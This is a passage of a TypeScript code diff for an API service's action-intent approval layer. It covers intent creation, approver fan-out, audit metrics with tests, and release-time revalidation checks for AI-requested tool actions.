+      lastStatus = row.status;
+      if (lastStatus !== 'pending_approval') return lastStatus;
+    } catch (err) {
+      console.error(`[intentService] waitForIntentDecision poll error for intent ${intentId}:`, err);
+    }
+
+    await new Promise((resolve) => setTimeout(resolve, pollInterval));
+    pollInterval = Math.min(pollInterval * 1.5, 3000);
+  }
+
+  return lastStatus;
+}

--- a/apps/api/src/services/actionIntents/intentService.ts
+++ b/apps/api/src/services/actionIntents/intentService.ts
@@ -4,7 +4,6 @@ import type { AssuranceLevel } from '@breeze/shared';
 import { db, withDbAccessContext, withSystemDbAccessContext, type DbAccessContext } from '../../db';
 import { actionIntents, intentOutbox, type ActionIntent, type ActionIntentSource, type ActionIntentStatus } from '../../db/schema/actionIntents';
 import { approvalRequests } from '../../db/schema/approvals';
-import { organizationUsers } from '../../db/schema/users';
 import { type AuthContext, dbAccessContextFromAuth } from '../../middleware/auth';
 import { aiTools, resolveWritableToolOrgId } from '../aiTools';
 import { checkGuardrails, type GuardrailCheck } from '../aiGuardrails';
@@ -12,6 +11,13 @@ import { getUserPermissions, userCanDecideApprovals } from '../permissions';
 import { dispatchApprovalPushToTokens, getUserPushTokens } from '../expoPush';
 import { canonicalizeArguments, computeArgumentDigest } from './canonicalize';
 import { recordActionIntentEvent } from './metrics';
+import { resolveIntentApprovers } from './intentApprovers';
+
+/** Statuses the partial `action_intents_org_idem_uniq` index dedupes on
+ * (IMPORTANT-4 — migration 2026-07-18-action-intents.sql). Kept as a single
+ * source of truth for both the onConflictDoNothing target predicate and the
+ * idempotent-replay re-select below, so the two can never drift apart. */
+const LIVE_INTENT_STATUSES: readonly ActionIntentStatus[] = ['pending_approval', 'approved', 'executing'];
 
 // Action intents & durable approval layer — core intent service (spec
 // docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
@@ -222,48 +228,31 @@ export async function createActionIntent(
     userId: requesterId,
   };
 
-  // Resolve eligible approvers (org members with approvals:decide, excluding
-  // the requester — spec §4 step 4) BEFORE opening the creation transaction
-  // below. The approver set doesn't depend on the intent row existing, so
-  // there's no reason to hold a pooled connection open across N sequential
-  // getUserPermissions round-trips (the #1105 connection-hold class — see
-  // apps/api/src/db/index.ts). getUserPermissions manages its own db context,
-  // so resolving it here, outside `withDbAccessContext` below, is exactly the
-  // point; only the members read needs the caller's org context. Each
-  // permission lookup is independent, so resolve them in parallel rather than
-  // sequentially. On a genuine idempotency conflict inside the transaction,
-  // this resolved set is simply discarded — cheap relative to the round-trip
-  // savings on the common (non-conflicting) path.
-  const members = await withDbAccessContext(dbContext, () =>
-    db
-      .select({ userId: organizationUsers.userId })
-      .from(organizationUsers)
-      .where(eq(organizationUsers.orgId, orgId)),
-  );
+  // Resolve eligible approvers (org + partner axis, filtered by
+  // approvals:decide, excluding the requester — spec §4 step 4 / CRITICAL-2)
+  // BEFORE opening the creation transaction below. resolveIntentApprovers
+  // manages its own system-scoped context internally (it must: partner_users
+  // is Shape-3 partner-axis RLS, invisible under the requester's org-scoped
+  // context — the exact gap CRITICAL-2 exists to close), so resolving it here
+  // avoids holding a pooled connection open across the round-trip (the #1105
+  // connection-hold class — see apps/api/src/db/index.ts). On a genuine
+  // idempotency conflict below, this resolved set is simply discarded —
+  // cheap relative to the round-trip savings on the common (non-conflicting)
+  // path.
+  const eligibleAll = await resolveIntentApprovers(orgId);
+  const eligibleApprovers = eligibleAll.filter((userId) => userId !== requesterId);
+  const requesterEligible = eligibleAll.includes(requesterId);
 
-  const approverEligibility = await Promise.all(
-    members.map(async (member) => {
-      const perms = await getUserPermissions(member.userId, { orgId });
-      return { userId: member.userId, eligible: !!perms && userCanDecideApprovals(perms) };
-    }),
-  );
-
-  const eligibleApprovers: string[] = [];
-  let requesterEligible = false;
-  for (const { userId, eligible } of approverEligibility) {
-    if (!eligible) continue;
-    if (userId === requesterId) {
-      requesterEligible = true;
-      continue;
-    }
-    eligibleApprovers.push(userId);
-  }
-
-  const creation = await withDbAccessContext(dbContext, async (): Promise<CreationResult> => {
+  // TX1 (org-scoped): insert the intent row, or detect an idempotent replay.
+  // action_intents is org-scoped Shape-1 — the requester inserting their own
+  // org's row is exactly what breeze_has_org_access(org_id) authorizes, so
+  // this stays under the caller's org context.
+  const insertOutcome = await withDbAccessContext(dbContext, async () => {
     const [inserted] = await db
       .insert(actionIntents)
       .values({
         orgId,
+        partnerId: auth.partnerId ?? null,
         requestedByUserId: requesterId,
         source: input.source,
         requestingClientLabel,
@@ -278,102 +267,176 @@ export async function createActionIntent(
         correlationId: randomUUID(),
         expiresAt,
       })
-      .onConflictDoNothing({ target: [actionIntents.orgId, actionIntents.idempotencyKey] })
+      // IMPORTANT-4: action_intents_org_idem_uniq is now a PARTIAL unique
+      // index (migration 2026-07-18-action-intents.sql) covering only LIVE
+      // statuses — a terminal intent must not block a legitimate future
+      // identical request. The conflict target's `where` must match the
+      // index predicate exactly (LIVE_INTENT_STATUSES) or Postgres can't
+      // infer which index to use and raises "no unique or exclusion
+      // constraint matching the ON CONFLICT specification".
+      .onConflictDoNothing({
+        target: [actionIntents.orgId, actionIntents.idempotencyKey],
+        where: inArray(actionIntents.status, LIVE_INTENT_STATUSES),
+      })
       .returning();
 
-    if (!inserted) {
-      // Idempotent replay: converge on the existing row instead of creating a
-      // duplicate (spec §4 step 3 / §13). No new fan-out, no new outbox row —
-      // the retry is a no-op beyond returning what already exists. The
-      // approver set resolved above is simply unused on this path.
-      const [existing] = await db
-        .select()
-        .from(actionIntents)
-        .where(and(eq(actionIntents.orgId, orgId), eq(actionIntents.idempotencyKey, idempotencyKey)))
-        .limit(1);
-      if (!existing) {
-        throw new ActionIntentError(
-          'Insert conflicted on (org_id, idempotency_key) but no existing row was found',
-          'idempotency_race',
-        );
-      }
-      const approvalRows = await db
-        .select({ id: approvalRequests.id })
-        .from(approvalRequests)
-        .where(eq(approvalRequests.intentId, existing.id));
-      return {
+    if (inserted) {
+      return { kind: 'new' as const, intent: inserted };
+    }
+
+    // Idempotent replay: converge on the existing LIVE row instead of
+    // creating a duplicate (spec §4 step 3 / §13). No new fan-out, no new
+    // outbox row — the retry is a no-op beyond returning what already
+    // exists. The approver set resolved above is simply unused on this path.
+    // Filtered to LIVE_INTENT_STATUSES (not just org_id+idempotency_key)
+    // because IMPORTANT-4 means multiple rows can now share the same key —
+    // at most one LIVE at a time (which is exactly what the conflict fired
+    // against) plus any number of prior terminal ones; an unfiltered select
+    // with no ORDER BY could nondeterministically return a stale terminal
+    // row instead.
+    const [existing] = await db
+      .select()
+      .from(actionIntents)
+      .where(
+        and(
+          eq(actionIntents.orgId, orgId),
+          eq(actionIntents.idempotencyKey, idempotencyKey),
+          inArray(actionIntents.status, LIVE_INTENT_STATUSES),
+        ),
+      )
+      .limit(1);
+    if (!existing) {
+      throw new ActionIntentError(
+        'Insert conflicted on (org_id, idempotency_key) but no existing live row was found',
+        'idempotency_race',
+      );
+    }
+    const approvalRows = await db
+      .select({ id: approvalRequests.id })
+      .from(approvalRequests)
+      .where(eq(approvalRequests.intentId, existing.id));
+    return {
+      kind: 'replay' as const,
+      result: {
         intent: existing,
         approvalRequestIds: approvalRows.map((r) => r.id),
         fanOutUserIds: [],
         isNew: false,
-      };
-    }
-
-    let approvalRequestIds: string[] = [];
-    let fanOutUserIds: string[] = [];
-
-    const approvalRowFor = (userId: string) => ({
-      userId,
-      requestingClientLabel,
-      actionLabel: targetSummary,
-      actionToolName: input.toolName,
-      actionArguments: input.input,
-      riskTier,
-      riskSummary: impactSummary,
-      status: 'pending' as const,
-      expiresAt,
-      intentId: inserted.id,
-      boundArgumentDigest: argumentDigest,
-      isRecursive: false,
-    });
-
-    if (eligibleApprovers.length > 0) {
-      const rows = await db
-        .insert(approvalRequests)
-        .values(eligibleApprovers.map(approvalRowFor))
-        .returning({ id: approvalRequests.id });
-      approvalRequestIds = rows.map((r) => r.id);
-      fanOutUserIds = eligibleApprovers;
-    } else if (requesterEligible) {
-      // Sole-operator branch: the only eligible approver is the requester.
-      // Create one row carrying the digest; the assurance-level >= 3 gate is
-      // enforced later, in the decide handler (Task 5), not here.
-      const rows = await db
-        .insert(approvalRequests)
-        .values([approvalRowFor(requesterId)])
-        .returning({ id: approvalRequests.id });
-      if (rows[0]) {
-        approvalRequestIds = [rows[0].id];
-        fanOutUserIds = [requesterId];
-      }
-    }
-
-    let finalIntent: ActionIntent = inserted;
-    if (approvalRequestIds.length === 0) {
-      // No eligible approvers and the requester isn't one either — fail
-      // closed: create then immediately cancel, visible in audit (spec §4
-      // step 4 / §8).
-      const [cancelled] = await db
-        .update(actionIntents)
-        .set({ status: 'cancelled', errorCode: 'no_eligible_approvers', decidedAt: new Date() })
-        .where(eq(actionIntents.id, inserted.id))
-        .returning();
-      finalIntent = cancelled ?? {
-        ...inserted,
-        status: 'cancelled',
-        errorCode: 'no_eligible_approvers',
-      };
-    }
-
-    await db.insert(intentOutbox).values({
-      intentId: inserted.id,
-      eventType: 'intent_created',
-      // Ids only, no argument content (spec §3.2).
-      payload: { intentId: inserted.id, orgId },
-    });
-
-    return { intent: finalIntent, approvalRequestIds, fanOutUserIds, isNew: true };
+      } satisfies CreationResult,
+    };
   });
+
+  if (insertOutcome.kind === 'replay') {
+    return toSnapshot(insertOutcome.result.intent, insertOutcome.result.approvalRequestIds);
+  }
+
+  const inserted = insertOutcome.intent;
+
+  // TX2 (system-scoped, CRITICAL-1): the cross-user approval_requests
+  // fan-out + the intent_outbox insert. approval_requests carries FORCED
+  // Shape-6 user-scoped RLS (WITH CHECK user_id = breeze_current_user_id() OR
+  // scope = 'system' — migration 2026-05-16-approval-shape6-system-bypass.sql),
+  // so inserting a row for an approver OTHER than the requester under the
+  // requester's org-scoped context denies with 42501 and aborts the whole
+  // transaction. Mirrors fanOutMobileApprovals's system-scope escalation
+  // (routes/agents/elevationRequests.ts:190-223) in spirit, but is
+  // deliberately NOT nested inside TX1 (i.e. not
+  // `runOutsideDbContext(() => withSystemDbAccessContext(...))` called from
+  // inside TX1's callback): approval_requests.intent_id and
+  // intent_outbox.intent_id both carry a real FK to action_intents(id), and a
+  // second, genuinely separate transaction (its own pooled connection) can
+  // only see `inserted.id` once TX1 has actually committed — Postgres's FK
+  // check fails fast ("is not present in table") against an uncommitted row
+  // in a concurrently-open transaction, it does not wait for it. So TX1 must
+  // close (return from withDbAccessContext) before TX2 opens; this trades
+  // strict atomicity between "intent row" and "fan-out" for correctness — the
+  // same tradeoff the elevation precedent accepts (its fan-out is explicitly
+  // best-effort/after-commit). A TX2 failure here is NOT swallowed the way
+  // elevation's per-approver push is: the intent already exists as a
+  // committed 'pending_approval' row with no approvers, so on any TX2 error
+  // we best-effort mark it 'failed' (never leave it silently orphaned) and
+  // rethrow so the caller (chat SDK / MCP) sees a real failure instead of a
+  // false success.
+  let creation: CreationResult;
+  try {
+    creation = await withSystemDbAccessContext(async (): Promise<CreationResult> => {
+      let approvalRequestIds: string[] = [];
+      let fanOutUserIds: string[] = [];
+
+      const approvalRowFor = (userId: string) => ({
+        userId,
+        requestingClientLabel,
+        actionLabel: targetSummary,
+        actionToolName: input.toolName,
+        actionArguments: input.input,
+        riskTier,
+        riskSummary: impactSummary,
+        status: 'pending' as const,
+        expiresAt,
+        intentId: inserted.id,
+        boundArgumentDigest: argumentDigest,
+        isRecursive: false,
+      });
+
+      if (eligibleApprovers.length > 0) {
+        const rows = await db
+          .insert(approvalRequests)
+          .values(eligibleApprovers.map(approvalRowFor))
+          .returning({ id: approvalRequests.id });
+        approvalRequestIds = rows.map((r) => r.id);
+        fanOutUserIds = eligibleApprovers;
+      } else if (requesterEligible) {
+        // Sole-operator branch: the only eligible approver is the requester.
+        // Create one row carrying the digest; the assurance-level >= 3 gate is
+        // enforced later, in the decide handler (Task 5), not here.
+        const rows = await db
+          .insert(approvalRequests)
+          .values([approvalRowFor(requesterId)])
+          .returning({ id: approvalRequests.id });
+        if (rows[0]) {
+          approvalRequestIds = [rows[0].id];
+          fanOutUserIds = [requesterId];
+        }
+      }
+
+      let finalIntent: ActionIntent = inserted;
+      if (approvalRequestIds.length === 0) {
+        // No eligible approvers and the requester isn't one either — fail
+        // closed: create then immediately cancel, visible in audit (spec §4
+        // step 4 / §8).
+        const [cancelled] = await db
+          .update(actionIntents)
+          .set({ status: 'cancelled', errorCode: 'no_eligible_approvers', decidedAt: new Date() })
+          .where(eq(actionIntents.id, inserted.id))
+          .returning();
+        finalIntent = cancelled ?? {
+          ...inserted,
+          status: 'cancelled',
+          errorCode: 'no_eligible_approvers',
+        };
+      }
+
+      await db.insert(intentOutbox).values({
+        intentId: inserted.id,
+        eventType: 'intent_created',
+        // Ids only, no argument content (spec §3.2).
+        payload: { intentId: inserted.id, orgId },
+      });
+
+      return { intent: finalIntent, approvalRequestIds, fanOutUserIds, isNew: true };
+    });
+  } catch (err) {
+    console.error(`[intentService] approval fan-out failed for intent ${inserted.id}:`, err);
+    await transitionIntent(inserted.id, 'pending_approval', 'failed', { errorCode: 'fanout_failed' }).catch(
+      (transitionErr) => {
+        console.error(`[intentService] failed to mark intent ${inserted.id} failed after fan-out error:`, transitionErr);
+      },
+    );
+    throw new ActionIntentError(
+      `Failed to fan out approval requests for action intent ${inserted.id}`,
+      'fanout_failed',
+    );
+  }
 
   // Best-effort push AFTER the creation transaction commits (#1105) — never
   // hold a DB transaction open across the push network round-trip. Token

--- a/apps/api/src/services/actionIntents/metrics.test.ts
+++ b/apps/api/src/services/actionIntents/metrics.test.ts
@@ -1,0 +1,170 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+import { Registry } from 'prom-client';
+
+const mockWriteAuditEvent = vi.fn();
+const mockRequestLikeFromSnapshot = vi.fn((..._args: unknown[]) => ({ req: { header: () => undefined } }));
+vi.mock('../auditEvents', () => ({
+  writeAuditEvent: (...args: unknown[]) => mockWriteAuditEvent(...args),
+  requestLikeFromSnapshot: (...args: unknown[]) => mockRequestLikeFromSnapshot(...args),
+}));
+
+import {
+  recordActionIntentEvent,
+  recordActionIntentMetric,
+  registerActionIntentPrometheusCounter,
+  setActionIntentMetricsRecorder,
+} from './metrics';
+
+describe('registerActionIntentPrometheusCounter', () => {
+  beforeEach(() => {
+    setActionIntentMetricsRecorder(null);
+  });
+
+  it('registers a counter labeled source/action/outcome under breeze_action_intents_total', async () => {
+    const registry = new Registry();
+    registerActionIntentPrometheusCounter(registry);
+
+    recordActionIntentMetric('chat', 'run_script', 'created');
+    recordActionIntentMetric('mcp_api', 'execute_command', 'approved');
+
+    const metrics = await registry.getMetricsAsJSON();
+    const counter = metrics.find((m) => m.name === 'breeze_action_intents_total');
+    expect(counter).toBeDefined();
+    expect(counter?.values).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          labels: { source: 'chat', action: 'run_script', outcome: 'created' },
+          value: 1,
+        }),
+        expect.objectContaining({
+          labels: { source: 'mcp_api', action: 'execute_command', outcome: 'approved' },
+          value: 1,
+        }),
+      ]),
+    );
+  });
+
+  it('reuses an already-registered counter instead of throwing on double registration', () => {
+    const registry = new Registry();
+    const first = registerActionIntentPrometheusCounter(registry);
+    const second = registerActionIntentPrometheusCounter(registry);
+    expect(second).toBe(first);
+  });
+});
+
+describe('recordActionIntentMetric', () => {
+  beforeEach(() => {
+    setActionIntentMetricsRecorder(null);
+  });
+
+  it('is a no-op until a recorder is registered', () => {
+    expect(() => recordActionIntentMetric('chat', 'run_script', 'created')).not.toThrow();
+  });
+});
+
+describe('recordActionIntentEvent', () => {
+  beforeEach(() => {
+    mockWriteAuditEvent.mockClear();
+    mockRequestLikeFromSnapshot.mockClear();
+    setActionIntentMetricsRecorder(null);
+  });
+
+  it('writes an action_intent.<outcome> audit event with result=success for a non-failure outcome', () => {
+    recordActionIntentEvent({
+      orgId: 'org-1',
+      intentId: 'intent-1',
+      actionName: 'run_script',
+      argumentDigest: 'a'.repeat(64),
+      source: 'chat',
+      outcome: 'created',
+      actorId: 'user-1',
+      details: { approverCount: 2 },
+    });
+
+    expect(mockRequestLikeFromSnapshot).toHaveBeenCalledWith({});
+    expect(mockWriteAuditEvent).toHaveBeenCalledTimes(1);
+    const [, event] = mockWriteAuditEvent.mock.calls[0] as [unknown, Record<string, unknown>];
+    expect(event.action).toBe('action_intent.created');
+    expect(event.orgId).toBe('org-1');
+    expect(event.resourceType).toBe('action_intent');
+    expect(event.resourceId).toBe('intent-1');
+    expect(event.result).toBe('success');
+    expect(event.actorType).toBe('user');
+    expect(event.actorId).toBe('user-1');
+    expect(event.details).toEqual({
+      actionName: 'run_script',
+      argumentDigest: 'a'.repeat(64),
+      source: 'chat',
+      approverCount: 2,
+    });
+  });
+
+  it.each(['rejected', 'expired', 'cancelled'] as const)(
+    'marks outcome=%s as result=failure',
+    (outcome) => {
+      recordActionIntentEvent({
+        orgId: 'org-1',
+        intentId: 'intent-1',
+        actionName: 'run_script',
+        argumentDigest: 'a'.repeat(64),
+        source: 'mcp_api',
+        outcome,
+      });
+      const [, event] = mockWriteAuditEvent.mock.calls[0] as [unknown, Record<string, unknown>];
+      expect(event.result).toBe('failure');
+    },
+  );
+
+  it('marks outcome=approved/executed/self_approved_sole_operator as result=success', () => {
+    for (const outcome of ['approved', 'executed', 'self_approved_sole_operator'] as const) {
+      mockWriteAuditEvent.mockClear();
+      recordActionIntentEvent({
+        orgId: 'org-1',
+        intentId: 'intent-1',
+        actionName: 'run_script',
+        argumentDigest: 'a'.repeat(64),
+        source: 'chat',
+        outcome,
+      });
+      const [, event] = mockWriteAuditEvent.mock.calls[0] as [unknown, Record<string, unknown>];
+      expect(event.result).toBe('success');
+    }
+  });
+
+  it('omits actorId and sets actorType=system when no actor is given', () => {
+    recordActionIntentEvent({
+      orgId: 'org-1',
+      intentId: 'intent-1',
+      actionName: 'run_script',
+      argumentDigest: 'a'.repeat(64),
+      source: 'chat',
+      outcome: 'expired',
+    });
+    const [, event] = mockWriteAuditEvent.mock.calls[0] as [unknown, Record<string, unknown>];
+    expect(event.actorType).toBe('system');
+    expect(event).not.toHaveProperty('actorId');
+  });
+
+  it('also increments the registered Prometheus counter', async () => {
+    const registry = new Registry();
+    registerActionIntentPrometheusCounter(registry);
+    recordActionIntentEvent({
+      orgId: 'org-1',
+      intentId: 'intent-1',
+      actionName: 'run_script',
+      argumentDigest: 'a'.repeat(64),
+      source: 'chat',
+      outcome: 'created',
+    });
+    const metrics = await registry.getMetricsAsJSON();
+    const counter = metrics.find((m) => m.name === 'breeze_action_intents_total');
+    expect(counter?.values).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          labels: { source: 'chat', action: 'run_script', outcome: 'created' },
+          value: 1,
+        }),
+      ]),
+    );
+  });
+});

--- a/apps/api/src/services/actionIntents/metrics.ts
+++ b/apps/api/src/services/actionIntents/metrics.ts
@@ -1,0 +1,123 @@
+import { Counter, type Registry } from 'prom-client';
+import { writeAuditEvent, requestLikeFromSnapshot } from '../auditEvents';
+import type { ActionIntentSource } from '../../db/schema/actionIntents';
+
+/**
+ * Observability for the action-intents durable approval layer (spec
+ * docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §7). Pattern-matches
+ * services/m365ControlPlane/readActionMetrics.ts: a settable recorder behind
+ * a Prometheus counter, plus an audit-event helper that fires both from one
+ * call so every call site only has to remember one function.
+ *
+ * `ActionIntentOutcome` is deliberately restricted to the exact seven audit
+ * actions the design spec names (§7) — `created`, `approved`, `rejected`,
+ * `expired`, `cancelled`, `executed`, `self_approved_sole_operator` — so the
+ * emitted `action_intent.<outcome>` audit action string is always one of
+ * those seven. Finer-grained detail (e.g. WHY a cancellation happened, such
+ * as `no_eligible_approvers`) belongs in `details.errorCode`, never a new
+ * outcome value — keeps the metrics cardinality and the audit vocabulary
+ * both bounded and matching the spec exactly.
+ */
+export type ActionIntentOutcome =
+  | 'created'
+  | 'approved'
+  | 'rejected'
+  | 'expired'
+  | 'cancelled'
+  | 'executed'
+  | 'self_approved_sole_operator';
+
+interface ActionIntentMetricsRecorder {
+  onEvent: (source: ActionIntentSource, action: string, outcome: ActionIntentOutcome) => void;
+}
+
+const noop = () => {};
+let recorder: ActionIntentMetricsRecorder = { onEvent: noop };
+
+export function setActionIntentMetricsRecorder(
+  next: Partial<ActionIntentMetricsRecorder> | null | undefined,
+): void {
+  recorder = { onEvent: next?.onEvent ?? noop };
+}
+
+export function recordActionIntentMetric(
+  source: ActionIntentSource,
+  action: string,
+  outcome: ActionIntentOutcome,
+): void {
+  recorder.onEvent(source, action, outcome);
+}
+
+const PROMETHEUS_COUNTER_NAME = 'breeze_action_intents_total';
+
+/**
+ * Registers (or reuses, if already registered on this Registry) the
+ * `breeze_action_intents_total{source,action,outcome}` counter named in spec
+ * §7. NOT yet wired into `routes/metrics.ts`'s app-wide registry — that one-line
+ * addition (mirroring `registerM365GraphReadActionPrometheusCounter` at
+ * routes/metrics.ts:92) is left for the task that first needs the counter
+ * live in `/metrics`, since this task's scope is the intent service only.
+ */
+export function registerActionIntentPrometheusCounter(
+  registry: Registry,
+): Counter<'source' | 'action' | 'outcome'> {
+  const existing = registry.getSingleMetric(PROMETHEUS_COUNTER_NAME);
+  const counter = (existing as Counter<'source' | 'action' | 'outcome'> | undefined) ?? new Counter({
+    name: PROMETHEUS_COUNTER_NAME,
+    help: 'Action intents created/decided/executed via the durable approval layer, by source, tool action, and outcome',
+    labelNames: ['source', 'action', 'outcome'] as const,
+    registers: [registry],
+  });
+  setActionIntentMetricsRecorder({
+    onEvent: (source, action, outcome) => counter.labels(source, action, outcome).inc(),
+  });
+  return counter;
+}
+
+const FAILURE_OUTCOMES = new Set<ActionIntentOutcome>(['rejected', 'expired', 'cancelled']);
+
+export interface ActionIntentAuditInput {
+  orgId: string;
+  intentId: string;
+  actionName: string;
+  argumentDigest: string;
+  source: ActionIntentSource;
+  outcome: ActionIntentOutcome;
+  /** User who triggered the event (requester or decider); omit for system-driven events (e.g. the reaper). */
+  actorId?: string;
+  /**
+   * Extra audit context — ids, decider, assurance, error codes, counts. Must
+   * NEVER carry raw tool argument contents, only the digest/summaries already
+   * computed (spec §7: "Details carry ids, action name, digest, decider,
+   * assurance — never argument contents beyond the summaries").
+   */
+  details?: Record<string, unknown>;
+}
+
+/**
+ * Records both the audit trail (`action_intent.<outcome>`) and the
+ * Prometheus counter for one action-intent lifecycle event. No `RequestLike`
+ * parameter — callers of the intent service run outside an HTTP request
+ * context (chat SDK sessions, MCP dispatch, background workers), so this
+ * always builds an empty snapshot-based RequestLike, same as
+ * services/deleteTenant.ts and services/aiToolsOrgs.ts.
+ */
+export function recordActionIntentEvent(input: ActionIntentAuditInput): void {
+  writeAuditEvent(requestLikeFromSnapshot({}), {
+    orgId: input.orgId,
+    action: `action_intent.${input.outcome}`,
+    resourceType: 'action_intent',
+    resourceId: input.intentId,
+    details: {
+      actionName: input.actionName,
+      argumentDigest: input.argumentDigest,
+      source: input.source,
+      ...input.details,
+    },
+    result: FAILURE_OUTCOMES.has(input.outcome) ? 'failure' : 'success',
+    actorType: input.actorId ? 'user' : 'system',
+    ...(input.actorId ? { actorId: input.actorId } : {}),
+  });
+  recordActionIntentMetric(input.source, input.actionName, input.outcome);
+}

--- a/apps/api/src/services/actionIntents/metrics.ts
+++ b/apps/api/src/services/actionIntents/metrics.ts
@@ -19,11 +19,16 @@ import type { ActionIntentSource } from '../../db/schema/actionIntents';
  * outcome value — keeps the metrics cardinality and the audit vocabulary
  * both bounded and matching the spec exactly.
  *
- * `digest_mismatch` is the one deliberate addition beyond the spec's seven:
- * the decide handler's tamper-detection tripwire (routes/approvals.ts —
- * `existing.boundArgumentDigest !== linkedIntent.argumentDigest`) refuses a
- * decision without ever calling `transitionIntent`, so none of the seven
- * lifecycle outcomes fit. It is a failure outcome (see `FAILURE_OUTCOMES`).
+ * `digest_mismatch` and `approver_unauthorized` are the two deliberate
+ * additions beyond the spec's seven: both are decide-time security refusals in
+ * the decide handler (routes/approvals.ts) that reject a decision WITHOUT ever
+ * calling `transitionIntent`, so none of the seven lifecycle outcomes fit.
+ * `digest_mismatch` fires on the tamper-detection tripwire
+ * (`existing.boundArgumentDigest !== linkedIntent.argumentDigest`);
+ * `approver_unauthorized` fires when the deciding user no longer holds
+ * approvals:decide / org access at decide time (a demoted approver reusing a
+ * still-visible fanned-out row). Both are failure outcomes (see
+ * `FAILURE_OUTCOMES`).
  */
 export type ActionIntentOutcome =
   | 'created'
@@ -33,7 +38,8 @@ export type ActionIntentOutcome =
   | 'cancelled'
   | 'executed'
   | 'self_approved_sole_operator'
-  | 'digest_mismatch';
+  | 'digest_mismatch'
+  | 'approver_unauthorized';
 
 interface ActionIntentMetricsRecorder {
   onEvent: (source: ActionIntentSource, action: string, outcome: ActionIntentOutcome) => void;
@@ -87,6 +93,7 @@ const FAILURE_OUTCOMES = new Set<ActionIntentOutcome>([
   'expired',
   'cancelled',
   'digest_mismatch',
+  'approver_unauthorized',
 ]);
 
 export interface ActionIntentAuditInput {

--- a/apps/api/src/services/actionIntents/metrics.ts
+++ b/apps/api/src/services/actionIntents/metrics.ts
@@ -18,6 +18,12 @@ import type { ActionIntentSource } from '../../db/schema/actionIntents';
  * as `no_eligible_approvers`) belongs in `details.errorCode`, never a new
  * outcome value — keeps the metrics cardinality and the audit vocabulary
  * both bounded and matching the spec exactly.
+ *
+ * `digest_mismatch` is the one deliberate addition beyond the spec's seven:
+ * the decide handler's tamper-detection tripwire (routes/approvals.ts —
+ * `existing.boundArgumentDigest !== linkedIntent.argumentDigest`) refuses a
+ * decision without ever calling `transitionIntent`, so none of the seven
+ * lifecycle outcomes fit. It is a failure outcome (see `FAILURE_OUTCOMES`).
  */
 export type ActionIntentOutcome =
   | 'created'
@@ -26,7 +32,8 @@ export type ActionIntentOutcome =
   | 'expired'
   | 'cancelled'
   | 'executed'
-  | 'self_approved_sole_operator';
+  | 'self_approved_sole_operator'
+  | 'digest_mismatch';
 
 interface ActionIntentMetricsRecorder {
   onEvent: (source: ActionIntentSource, action: string, outcome: ActionIntentOutcome) => void;
@@ -75,7 +82,12 @@ export function registerActionIntentPrometheusCounter(
   return counter;
 }
 
-const FAILURE_OUTCOMES = new Set<ActionIntentOutcome>(['rejected', 'expired', 'cancelled']);
+const FAILURE_OUTCOMES = new Set<ActionIntentOutcome>([
+  'rejected',
+  'expired',
+  'cancelled',
+  'digest_mismatch',
+]);
 
 export interface ActionIntentAuditInput {
   orgId: string;

--- a/apps/api/src/services/actionIntents/revalidateRelease.ts
+++ b/apps/api/src/services/actionIntents/revalidateRelease.ts
@@ -1,0 +1,81 @@
+import type { ActionIntent } from '../../db/schema/actionIntents';
+import type { AuthContext } from '../../middleware/auth';
+import { getToolTier } from '../aiTools';
+import { checkToolPermission } from '../aiGuardrails';
+import { getActiveOrgTenant } from '../tenantStatus';
+import { buildAuthContextForIntent } from './actorContext';
+
+/**
+ * Shared release-time revalidation for an approved action intent (spec
+ * docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §5 step 2). Extracted so the TWO release paths — the durable
+ * `jobs/intentReleaseWorker.ts` and the inline chat path in
+ * `services/aiAgentSdk.ts` — run the IDENTICAL fail-closed checks. Previously
+ * only the worker revalidated; the inline path executed the still-live chat
+ * session's tool under the ORIGINAL `session.auth` the moment it won the
+ * `approved -> executing` CAS, so a requester demoted, deactivated, or stripped
+ * of org access during the approval wait still had their action executed if the
+ * live session won the race against the worker.
+ *
+ * Returns the freshly-rebuilt actor `auth` on success. Callers decide how to
+ * EXECUTE: the worker executes under this rebuilt context; the inline chat path
+ * executes under its live `session.auth` (which alone carries the session-aware
+ * M365/Google connection context) — but only AFTER this returns ok, i.e. only
+ * once the requester's CURRENT authorization has been re-proven. The rebuilt
+ * `auth` and `session.auth` describe the same user + org (accessibleOrgIds ===
+ * [intent.orgId] === session.orgId), so they are interchangeable for tenant
+ * scope; the difference is only that this one reflects live DB state.
+ *
+ * Every failure carries the same `errorCode` the worker has always CASed
+ * `executing -> failed` with, so audit/metrics semantics are unchanged.
+ */
+export type IntentReleaseRevalidation =
+  | { ok: true; auth: AuthContext }
+  | { ok: false; errorCode: string; details?: Record<string, unknown> };
+
+export async function revalidateApprovedIntentForRelease(
+  intent: ActionIntent,
+  winningApproval: { boundArgumentDigest: string | null } | null,
+): Promise<IntentReleaseRevalidation> {
+  // (a) The winning approval row must still exist and must have approved the
+  // SAME content the intent currently carries (action_intents content is
+  // DB-immutable; this is defense-in-depth).
+  if (!winningApproval || winningApproval.boundArgumentDigest !== intent.argumentDigest) {
+    return { ok: false, errorCode: 'digest_mismatch' };
+  }
+
+  // (b) The tool must still exist and must not have been reclassified to a
+  // HIGHER tier since the intent was created (lower/equal only tightens what
+  // the approval covered).
+  const currentTier = getToolTier(intent.actionName);
+  if (currentTier === undefined || currentTier > intent.riskTier) {
+    return {
+      ok: false,
+      errorCode: 'tier_escalated',
+      details: { currentTier: currentTier ?? null, intentRiskTier: intent.riskTier },
+    };
+  }
+
+  // (c) The actor must still be valid: rebuild the AuthContext from scratch,
+  // re-checking the user is active and still has access to intent.orgId.
+  const auth = await buildAuthContextForIntent(intent);
+  if (!auth) {
+    return { ok: false, errorCode: 'actor_invalid' };
+  }
+
+  // (d) The org (and its owning partner) must still be active.
+  const activeOrg = await getActiveOrgTenant(intent.orgId);
+  if (!activeOrg) {
+    return { ok: false, errorCode: 'org_inactive' };
+  }
+
+  // (e) The actor must STILL hold the specific RBAC permission the tool
+  // requires, checked against the rebuilt `auth` from (c) — not the caller's
+  // original, now possibly stale, permission check.
+  const permissionDenial = await checkToolPermission(intent.actionName, intent.arguments, auth);
+  if (permissionDenial) {
+    return { ok: false, errorCode: 'rbac_denied', details: { reason: permissionDenial } };
+  }
+
